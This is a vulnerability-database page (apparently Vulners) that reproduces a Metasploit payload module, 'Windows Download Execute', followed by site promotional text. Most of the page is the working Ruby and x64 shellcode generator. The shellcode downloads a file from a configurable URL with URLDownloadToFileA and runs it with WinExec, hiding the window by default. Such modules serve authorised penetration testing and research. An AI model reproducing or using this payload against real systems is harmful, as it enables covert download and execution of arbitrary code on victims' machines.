Vulners
Lucene search
Windows Download Execute
🗓️ 13 Aug 2025 18:54:57Reported by Muzaffer Umut ŞAHİN <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 506 Views
# frozen_string_literal: true
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 353
include Msf::Payload::Single
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi_x64
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Download Execute',
'Description' => 'Downloads and executes the file from the specified url.',
'Author' => 'Muzaffer Umut ŞAHİN <[email protected]>',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X64
)
)
display_options = %w[HIDE SHOW]
register_options(
[
OptString.new('URL', [true, 'The url to download the file from.', 'http://localhost/hi.exe']),
OptString.new('FILEPATH', [true, 'The path to save the downloaded file.', 'fox.exe']),
OptEnum.new('DISPLAY', [true, 'The Display type.', display_options[0], display_options])
]
)
end
def generate(_opts = {})
url = datastore['URL'] || 'http://localhost/hi.exe'
file = datastore['FILEPATH'] || 'fox.exe'
display = datastore['DISPLAY'] || 'HIDE'
url_length = url.bytesize
file_length = file.bytesize
url = Metasm::Shellcode.define_data(url)
file = Metasm::Shellcode.define_data(file)
payload = %^
cld
and rsp, -16
call main
#{asm_block_api}
main:
pop rbp
call LoadLibrary
db "urlmon.dllK"
LoadLibrary:
pop rcx ; rcx points to the dll name.
xor byte [rcx+10], 'K' ; null terminator
mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp ; LoadLibraryA("urlmon.dll")
; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher.
SetUrl:
call SetFile
#{url}
db 0x41
SetFile:
pop rdx ; 2nd argument
xor byte [rdx+#{url_length}], 'A' ; null terminator
call UrlDownloadToFile
#{file}
db 0x43
UrlDownloadToFile:
pop r8 ; 3rd argument
xor byte [r8+#{file_length}], 'C' ; null terminator
xor rcx,rcx ; 1st argument
xor r9,r9 ; 4th argument
sub rsp, 8
push rcx ; 5th argument
mov r10d, #{block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
call rbp
SetCommand:
call Exec
db "cmd /c "
#{file}
db 0x46
Exec:
pop rcx ; 1st argument
xor byte [rcx+#{file_length + 7}], 'F' ; null terminator
mov r10d, #{block_api_hash('kernel32.dll', 'WinExec')}
xor rdx, rdx ; 2nd argument
^
if display == 'HIDE'
hide = %(
call rbp
)
payload << hide
elsif display == 'SHOW'
show = %(
inc rdx ; SW_NORMAL = 1
call rbp
)
payload << show
end
if datastore['EXITFUNC'] == 'process'
exit_asm = %(
xor rcx,rcx
mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
call rbp
)
payload << exit_asm
elsif datastore['EXITFUNC'] == 'thread'
exit_asm = %(
xor rcx,rcx
mov r10d, #{block_api_hash('kernel32.dll', 'ExitThread')}
call rbp
)
payload << exit_asm
end
Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jun 2026 19:02Current
5.8Medium risk
Vulners AI Score5.8